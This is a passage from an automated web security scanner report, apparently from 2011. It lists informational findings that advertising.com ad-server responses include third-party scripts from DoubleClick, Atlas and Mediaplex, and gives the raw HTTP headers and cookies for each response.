Set-Cookie: C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8I; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: F1=BQ+T63EBAAAABAAAAQBA+BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5CKYmQk/N!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpMsRQ8JMP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:48:04 GMT; path=/
Set-Cookie: 42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=42950117=_4dfa4fe4,2035415743,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=42950117/optn=64?trg=;ord=2035415743?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=45425146/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001029516/cstr=45425146=_4dfa5736,5745513245,768034^1029516^1183^0,1_/xsxdata=$xsxdata/bnum=45425146/optn=64?trg=;ord=5745513245?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:19:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:19:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXIbtiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvGAHt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD7oROzNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7Nea54Ml6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: 45425146=_4dfa5736,5745513245,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001029516/cstr=45425146=_4dfa5736,5745513245,768034^1029516^1183^0,1_/xsxdata=$xsxdata/bnum=45425146/optn=64?trg=;ord=5745513245?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=54039788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64?trg=;ord=6354081067?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1024394.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:27:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 783
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: 54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64?trg=;ord=6354081067?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=58502192/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981604/cstr=58502192=_4dfa462f,7842678840,768034^981604^1183^0,1_/xsxdata=$xsxdata/bnum=58502192/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:06:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 18:06:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=vYk+NFJwHob0Fs6sIWwJoagjtKPCC0nRfJpwEg02FdMBdbdRHTwihX0xEwjmGdMBxGeRHTAQva0xEQW4FdMBLppRHTQghX0xEgN5FdMB6ijRHTAmhX0xEAY4FdMBdDmRHTA/ya0xEAVZGdMBYimRHTA3Wa0xEQY4FdMBFGeRHTAxBa0xEU1aGdMBbTeRHTQwBa0xEYnXGdMBWGoRHTgQva0xEogmGdMBxmpRHTQRga0xE0soGdMB8mpRHHZAmZOiGpZj0jw+NXActiGA8Moxl7a+AcsmGXuAEOphCbLuBoKuGr/smJwokaowzClALRqhCXaxAMdPGYwrQQwdIawh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: F1=B8iR63EBAAAABAAAAoAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: ROLL=U6APHjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/keP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
Set-Cookie: 58502192=_4dfa462f,7842678840,768034^981604^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981604/cstr=58502192=_4dfa462f,7842678840,768034^981604^1183^0,1_/xsxdata=$xsxdata/bnum=58502192/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=63972603/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=3485571020&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^960484^1183^0,1_/xsxdata=$XSXDATA/bnum=63972603/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:22:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 550
Date: Thu, 16 Jun 2011 18:22:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Unk+NFJwHob0Fp6sIWwJoaUjtKPCC0nheJpwEg02FaMBdbdhGTwihXoxEwjmGaMBxGehGTAQvaoxEQW4FaMBLpphGTQghXoxEgN5FaMB6ijhGTAmhXoxEAY4FaMBdDmhGTA/yaoxEAVZGaMBYimhGTA3WaoxEQY4FaMBFGehGTAxBaoxEU1aGaMBbTehGTQwBaoxEYnXGaMBWGohGTgQvaoxEogmGaMBxmphGTQRgaoxE0soGaMB8mphGHZAmZOiGmZj0jw+NX0btiGA8MoBl7a+AcsmGUuAEOpxBbLuBoKuGo/smJwokacwzClALRqxBXaxAMdPGVwrQQwdIakhq62ApVmBwD; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: F1=BQdS63EBAAAABAAAA4AAICA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: BASE=x7Q9Xi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixfE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: ROLL=U6APLjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTcL!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:22:12 GMT; path=/
Set-Cookie: 63972603=_4dfa49d4,3485571020,768034^960484^1183^0,0_; domain=advertising.com; path=/click

document.write('<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=3485571020&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000960484/cstr=63972603=_4dfa49d4,3485571020,768034^960484^1183^0,1_/xsxdata=$XSXDATA/bnum=63972603/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=66502577/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001029516/cstr=66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,1_/xsxdata=$xsxdata/bnum=66502577/optn=64?trg=;ord=8658162855?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:08:55 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:08:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: F1=BcMV63EBAAAABAAAAsBA2BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/P5PEEVdwP!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpKPi7sVuHG!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:08:55 GMT; path=/
Set-Cookie: 66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001029516/cstr=66502577=_4dfa54c7,8658162855,768034^1029516^1183^0,1_/xsxdata=$xsxdata/bnum=66502577/optn=64?trg=;ord=8658162855?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=83819639=_4dfa4eae,6403574311,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=83819639/optn=64?trg=;ord=6403574311?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:42:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:42:54 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3EQRKdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpiOE5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: 83819639=_4dfa4eae,6403574311,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=83819639=_4dfa4eae,6403574311,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=83819639/optn=64?trg=;ord=6403574311?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981604/cstr=83891309=_4dfa44f7,5772552350,768034^981604^1183^0,1_/xsxdata=$xsxdata/bnum=83891309/optn=64?trg=

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:01:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 18:01:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=3Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXActiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: F1=BcPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wJA3zrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLFkisFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:27 GMT; path=/
Set-Cookie: 83891309=_4dfa44f7,5772552350,768034^981604^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000981604/cstr=83891309=_4dfa44f7,5772552350,768034^981604^1183^0,1_/xsxdata=$xsxdata/bnum=83891309/optn=64?trg="><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000994447/cstr=84418946=_4dfa511a,2430472668,768034^994447^1183^0,1_/xsxdata=$xsxdata/bnum=84418946/optn=64?trg=;ord=2430472668?

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:53:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:53:14 GMT
Connection: close
